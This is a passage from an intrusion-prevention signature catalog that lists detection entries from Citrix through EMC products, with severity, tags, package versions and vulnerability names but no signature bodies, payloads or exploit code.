Tags: Windows, Any Hardware, Citrix Presentation Server, Citrix Access Essentials, Citrix Desktop Server, Citrix MetaFrame Presentation Server, CVE2008, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-196-2032
Last changed: sgpkg-ips-368-4219
Vulnerability: Citrix-IMA-Service-Buffer-Overflow
Description:
Back to top

Generic_CS-Citrix-MetaFrame-IMA-Authentication-Processing-Buffer-Overflow

About this situation: A Citrix MetaFrame IMA Authentication Processing Buffer Overflow vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Citrix MetaFrame, CVE2006, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1000-5242
Vulnerability: Citrix-MetaFrame-IMA-Authentication-Processing-Buffer-Overflow
Description:
Back to top

Generic_CS-Claymore-Dual-GPU-Miner-Format-String-DOS-Attack

About this situation: A Claymore Dual GPU Miner Format String DOS Attack Vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, Claymore Dual GPU Miner, CVE2018, Windows not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1075-5242
Vulnerability: Claymore-Dual-GPU-Miner-Format-String-DOS-Attack
Description:
Back to top

Generic_CS-Cleartext-SIP-Commands-After-TLS-Handshake

About this situation: Cleartext SIP protocol command traffic after TLS handshake detected
Context: UDP Packet Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, OpenSSL, GnuTLS, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-632-5211
Description:
Back to top

Generic_CS-Cloudme-Sync-Stack-Based-Buffer-Overflow

About this situation: A Cloudme Sync Stack-Based Buffer Overflow vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, CloudMe Sync, CVE2018, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1071-5242
Vulnerability: Cloudme-Sync-Stack-Based-Buffer-Overflow
Description:
Back to top

Generic_CS-Codesys-Gateway-Server-DoS-Vulnerability

About this situation: A vulnerability in CoDeSys Gateway Server
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, Any Operating System not specific, Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Codesys-Gateway-Server-DoS-Vulnerability
Description:
Back to top

Generic_CS-Codesys-Gateway-Server-Opcode-0x3ef-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-712-5211
Vulnerability: Codesys-Gateway-Server-Opcode-0x3ef-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Codesys-V3-Cmprouter-And-Cmprouterembedded-Integer-Overflow

About this situation: An attempt to exploit a vulnerability in Smart Software Solutions CoDeSys Control for BeagleBone detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Smart Software Solutions CoDeSys, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1241-5242
Last changed: sgpkg-ips-1241-5242
Vulnerability: Codesys-V3-Cmprouter-And-Cmprouterembedded-Integer-Overflow
Description:
Back to top

Generic_CS-Cogent-Datahub-Remote-Unicode-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Cogent Datahub detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Cogent DataHub, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-610-5211
Vulnerability: Cogent-Datahub-Remote-Unicode-Buffer-Overflow
Description:
Back to top

Generic_CS-Coinminer-Trojan-Traffic

About this situation: A cryptocoin miner
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1345-5242
Last changed: sgpkg-ips-1700-5242
Vulnerability: Coinminer-Trojan-Traffic
Description:
Back to top

Generic_CS-Computer-Associates-ARCserve-Backup-Discovery-Service-DoS

About this situation: An attempt to exploit a vulnerability in Computer Associates ARCserve Backup detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Computer Associates Business Protection Suite, Computer Associates BrightStor ARCserve Backup, Computer Associates Server Protection Suite, CVE2008, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Computer-Associates-ARCserve-Backup-Discovery-Service-Denial-Of-Service
Description:
Back to top

Generic_CS-Computer-Associates-iGateway-Buffer-Overflow

About this situation: Buffer overflow vulnerability in Computer Associates iGateway 3.0 and 4.0 before 4.0.050623
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Computer Associates iTechnology iGateway, CVE2005, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-647-5211
Vulnerability: Computer-Associates-iGateway-Buffer-Overflow
Description:
Back to top

Generic_CS-Cstealer-Infection-Traffic

About this situation: Cstealer trojan infection traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Cstealer-Infection-Traffic
Description:
Back to top

Generic_CS-Dahua-DVR-Auth-Bypass

About this situation: An attempt to exploit a Dahua DVR Auth Bypass vulnerability detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Dahua, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-779-5211
Last changed: sgpkg-ips-779-5211
Vulnerability: Dahua-DVR-Auth-Bypass
Description:
Back to top

Generic_CS-Dameware-Mini-Remote-Control-Server-Pre-Authentication-BOF

About this situation: An attack against Dameware Mini Remote Control Server was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, DameWare Mini Remote Control, CVE2003, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-507-5211
Last changed: sgpkg-ips-1782-5242
Vulnerability: Dameware-Mini-Remote-Control-Server-Pre-Authentication-BOF
Description:
Back to top

Generic_CS-DanaBot-C2-Traffic

About this situation: DanaBot C2 traffic was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1782-5242
Vulnerability: DanaBot-C2-Traffic
Description:
Back to top

Generic_CS-DATAC-Control-RealWin-SCADA-System-Crafted-Packet-Handling-BOF

About this situation: An attempt to exploit a buffer overflow vulnerability in DATAC Control RealWin SCADA System detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows XP, Windows 2000, Any Hardware, DATAC Control RealWin SCADA System, CVE2008, Windows XP not specific, Windows 2000 not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-174-2032
Last changed: sgpkg-ips-610-5211
Vulnerability: DATAC-Control-RealWin-SCADA-System-Crafted-Packet-Handling-Buffer-Overflow
Description:
Back to top

Generic_CS-Dell-NetVault-Backup-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Dell NetVault Backup detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Dell NetVault Backup, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-675-5211
Last changed: sgpkg-ips-988-5242
Vulnerability: Dell-NetVault-Backup-Denial-Of-Service
Description:
Back to top

Generic_CS-Dell-OpenManage-Web-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Dell OpenManage detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Dell OpenManage, CVE2004, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-415-4219
Vulnerability: Dell-OpenManage-Web-Server-Buffer-Overflow
Description:
Back to top

Generic_CS-Delta-Electronics-Industrial-Automation-Ahsim_5x0-Simulator-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Delta Electronics Industrial Automation COMMGR
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics Industrial Automation COMMGR, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1112-5242
Vulnerability: Delta-Electronics-Industrial-Automation-Ahsim_5x0-Simulator-Buffer-Overflow
Description:
Back to top

Generic_CS-Delta-Electronics-Infrasuite-Device-Master-Checkloadingstartupconfig-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Delta Electronics InfraSuite Device Master detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics InfraSuite Device Master, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1526-5242
Last changed: sgpkg-ips-1590-5242
Vulnerability: Delta-Infrasuite-Device-Master-Checkloadingstartupconfig-Dir-Traversal
Description:
Back to top

Generic_CS-Delta-Electronics-Infrasuite-Device-Master-datacollect-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Delta Electronics InfraSuite Device Master detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics InfraSuite Device Master, CVE2022, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Vulnerability: Delta-Electronics-Infrasuite-Device-Master-datacollect-Insecure-Deserialization
Description:
Back to top

Generic_CS-Delta-Electronics-Infrasuite-Device-Master-Opcode-512-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Delta Electronics InfraSuite Device Master detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics InfraSuite Device Master, CVE2022, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1568-5242
Last changed: sgpkg-ips-1582-5242
Vulnerability: Delta-Electronics-Infrasuite-Device-Master-Opcode-512-Directory-Traversal
Description:
Back to top

Generic_CS-DEWESoft-X3-Internal-Command-Access-CVE-2018-7756

About this situation: An attempt to exploit a vulnerability in DEWESoft X3 SP1 detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, DEWESoft X3, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1321-5242
Last changed: sgpkg-ips-1321-5242
Vulnerability: DEWESoft-X3-Internal-Command-Access-CVE-2018-7756
Description:
Back to top

Generic_CS-Digium-Asterisk-Chan_Skinny-Sccp-Packet-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-919-5242
Vulnerability: Digium-Asterisk-Chan_Skinny-Sccp-Packet-Denial-Of-Service
Description:
Back to top

Generic_CS-Digium-Asterisk-Manager-Shell-Command-Usage

About this situation: Asterisk Manager SHELL command usage detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2012, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-453-4333
Last changed: sgpkg-ips-453-4333
Vulnerability: Digium-Asterisk-Manager-User-Shell-Command-Execution
Description:
Back to top

Generic_CS-Digium-Asterisk-Skinny-Channel-Driver-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Digium Asterisk Open Source detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-452-4333
Last changed: sgpkg-ips-452-4333
Vulnerability: Digium-Asterisk-Skinny-Channel-Driver-Heap-Buffer-Overflow
Description:
Back to top

Generic_CS-Digium-Asterisk-Skinny-Channel-Null-Pointer-Dereference

About this situation: A Digium Asterisk Skinny Channel Null-Pointer Dereference vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-999-5242
Last changed: sgpkg-ips-999-5242
Vulnerability: Digium-Asterisk-Skinny-Channel-Null-Pointer-Dereference
Description:
Back to top

Generic_CS-Digium-Multiple-Asterisk-Products-Skinny-Channel-Driver-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in Digium Asterisk detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Digium Asterisk, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-584-5211
Last changed: sgpkg-ips-584-5211
Vulnerability: Digium-Multiple-Asterisk-Products-Skinny-Channel-Driver-Denial-of-Service
Description:
Back to top

Generic_CS-Disk-Savvy-Enterprise-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Disk Savvy Enterprise detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, DiskSavvy, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1112-5242
Vulnerability: Disk-Savvy-Enterprise-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-distcc-Remote-Shell-Execution

About this situation: An attempt to exploit a weakness in distcc was detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, distcc, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-309-4219
Last changed: sgpkg-ips-309-4219
Vulnerability: distcc-Remote-Shell-Execution
Description:
Back to top

Generic_CS-Django-Multipartparser-Infinite-Loop-DoS

About this situation: An attempt to exploit a vulnerability in the HTTP multipart parser of Django detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Unix, Linux, Any Hardware, Django, CVE2022, Unix not specific, Linux not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1460-5242
Last changed: sgpkg-ips-1581-5242
Vulnerability: Django-Multipartparser-Infinite-Loop-DoS
Description:
Back to top

Generic_CS-Donbot-Spambot

About this situation: Donbot spambot command and control channel communication detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Donbot spambot, Windows not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-269-3038
Vulnerability: Donbot-Spambot
Description:
Back to top

Generic_CS-Dopewars-Denial-of-Service

About this situation: An attempt to exploit a Dopewars Denial of Service vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 2
Tags: Any Operating System, Any Hardware, Dopewars, CVE2009, Any Operating System not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-725-5211
Vulnerability: Dopewars-Denial-of-Service
Description:
Back to top

Generic_CS-Dorkbot-Traffic

About this situation: A suspicious traffic pattern detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-571-5211
Vulnerability: Dorkbot-Botnet
Description:
Back to top

Generic_CS-DoublePulsar-Shellcode

About this situation: DoublePulsar shellcode detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, MS2017-03, CVE2017, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1105-5242
Last changed: sgpkg-ips-1105-5242
Vulnerability: Microsoft-Windows-Smb-Server-Smbv1-CVE-2017-0144-Memory-Corruption
Description:
Back to top

Generic_CS-Ebury-SSH-Backdoor-Activity

About this situation: Ebury SSH Rootkit backdoor detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Linux, Any Hardware, Ebury SSH Rootkit, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1730-5242
Vulnerability: Ebury-SSH-Backdoor-Activity
Description:
Back to top

Generic_CS-Eclipse-Equinoxe-OSGi-Console-Command-Execution

About this situation: An Eclipse Equinoxe OSGi Console Command Execution vulnerability
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, Eclipse Equinoxe OSGi, Windows not specific, Linux not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1071-5242
Vulnerability: Eclipse-Equinoxe-OSGi-Console-Command-Execution
Description:
Back to top

Generic_CS-Eclipse-Mosquitto-ACL-Bypass-CVE-2017-7650

About this situation: An attempt to exploit a vulnerability in Eclipse Mosquitto detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Eclipse Foundation Mosquitto, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic, 5th Most Recent Update
First detected in: sgpkg-ips-1869-5242
Last changed: sgpkg-ips-1869-5242
Vulnerability: Eclipse-Mosquitto-ACL-Bypass-CVE-2017-7650
Description:
Back to top

Generic_CS-Eclipse-Mosquitto-MQTT-Subscribe-Topic-Stack-Overflow

About this situation: An attempt to exploit a vulnerability in Eclipse Foundation Mosquitto detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, Eclipse Foundation Mosquitto, CVE2019, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1560-5242
Vulnerability: Eclipse-Mosquitto-MQTT-Subscribe-Topic-Stack-Overflow
Description:
Back to top

Generic_CS-eIQnetworks-ESA-Buffer-Overflow

About this situation: An attempt to exploit an eIQnetworks ESA Buffer Overflow vulnerability detected.
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, eIQNetworks ESA, CVE2006, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-734-5211
Vulnerability: eIQnetworks-ESA-Buffer-Overflow
Description:
Back to top

Generic_CS-Embarcadero-Interbase-ConnReq-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Embarcadero Interbase detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Linux, Any Hardware, Borland Interbase, Windows not specific, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-391-4219
Last changed: sgpkg-ips-677-5211
Vulnerability: Generic_CS-CA-Embarcadero-Interbase-ConnReq-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-EMC-Alphastor-3.1-Buffer-Overflow

About this situation: EMC Alphastor 3.1 Stack Based Buffer Overflow
Context: TCP Client Stream Unknown
Severity: 7
Tags: Windows, Any Hardware, EMC AlphaStor, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-653-5211
Last changed: sgpkg-ips-653-5211
Vulnerability: EMC-Alphastor-3.1-Buffer-Overflow
Description:
Back to top

Generic_CS-EMC-Alphastor-Device-Manager-0x41-Command-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EMC AlphaStor detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AlphaStor, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-525-5211
Vulnerability: EMC-Alphastor-Device-Manager-0x41-Command-Buffer-Overflow
Description: CVE References: CVE-2013-0930
Back to top

Generic_CS-EMC-Alphastor-Device-Manager-Command-Injection

About this situation: An attempt to exploit a vulnerability in EMC AlphaStor detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AlphaStor, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-508-5211
Vulnerability: EMC-Alphastor-Device-Manager-Command-Injection
Description:
Back to top

Generic_CS-EMC-Alphastor-Device-Manager-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in EMC AlphaStor detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AlphaStor, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-508-5211
Last changed: sgpkg-ips-508-5211
Vulnerability: EMC-Alphastor-Device-Manager-Format-String-Vulnerability
Description:
Back to top

Generic_CS-EMC-Alphastor-Library-Control-Program-Multiple-Buffer-Overflows

About this situation: An attempt to exploit a vulnerability in EMC AlphaStor detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AlphaStor, CVE2013, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-525-5211
Last changed: sgpkg-ips-525-5211
Vulnerability: EMC-Alphastor-Library-Control-Program-Multiple-Buffer-Overflows
Description:
Back to top

Generic_CS-EMC-Autostart-Error-Logging-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in EMC AutoStart detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AutoStart, CVE2011, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-414-4219
Vulnerability: EMC-Autostart-Error-Logging-Stack-Buffer-Overflow
Description:
Back to top

Generic_CS-EMC-Autostart-Ftagent-Opcode-20-Subcode-2060-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in EMC AutoStart detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AutoStart, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1379-5242
Vulnerability: EMC-Autostart-Ftagent-Opcode-20-Multiple-Subcodes-Remote-Command-Execution
Description:
Back to top

Generic_CS-EMC-Autostart-Ftagent-Opcode-20-Subcode-2219-Remote-Command-Execution

About this situation: An attempt to exploit a vulnerability in EMC AutoStart detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AutoStart, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-665-5211
Last changed: sgpkg-ips-665-5211
Vulnerability: EMC-Autostart-Ftagent-Opcode-20-Multiple-Subcodes-Remote-Command-Execution
Description:
Back to top

Generic_CS-EMC-Autostart-Ftagent-Opcode-83-Subcode-22-SQL-Injection

About this situation: An attempt to exploit a vulnerability in EMC AutoStart detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AutoStart, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Vulnerability: EMC-Autostart-Ftagent-Opcode-20-Multiple-Subcodes-Remote-Command-Execution
Description:
Back to top

Generic_CS-EMC-Autostart-Ftagent-Opcode-85-Subcode-33-SQL-Injection

About this situation: An attempt to exploit a vulnerability in EMC AutoStart detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AutoStart, CVE2015, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-668-5211
Last changed: sgpkg-ips-668-5211
Vulnerability: EMC-Autostart-Ftagent-Opcode-85-Subcode-33-SQL-Injection
Description:
Back to top

Generic_CS-EMC-Autostart-Ftagent.exe-Multiple-Integer-Overflow-Vulnerabilities

About this situation: An attempt to exploit a vulnerability in EMC AutoStart detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AutoStart, CVE2012, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-473-5211
Last changed: sgpkg-ips-473-5211
Vulnerability: EMC-Autostart-Ftagent.exe-Multiple-Integer-Overflow-Vulnerabilities
Description:
Back to top

Generic_CS-EMC-Autostart-Ftagent.exe-Null-Byte-Write

About this situation: An attempt to exploit a vulnerability in EMC AutoStart detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC AutoStart, CVE2012, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-474-5211
Last changed: sgpkg-ips-600-5211
Vulnerability: EMC-Autostart-Ftagent.exe-Null-Byte-Write
Description:
Back to top

Generic_CS-EMC-Dantz-Retrospect-Backup-Agent-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in EMC Retrospect Client detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Retrospect Client, CVE2006, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-605-5211
Last changed: sgpkg-ips-679-5211
Vulnerability: EMC-Dantz-Retrospect-Backup-Agent-Denial-Of-Service
Description:
Back to top

Generic_CS-EMC-Data-Protection-Advisor-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in EMC Data Protection Advisor detected
Context: TCP Client Stream Unknown
Severity: 7
Tags: Any Operating System, Any Hardware, EMC Data Protection Advisor, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-448-4219
Last changed: sgpkg-ips-1401-5242
Vulnerability: EMC-Data-Protection-Advisor-Denial-Of-Service
Description:
Back to top

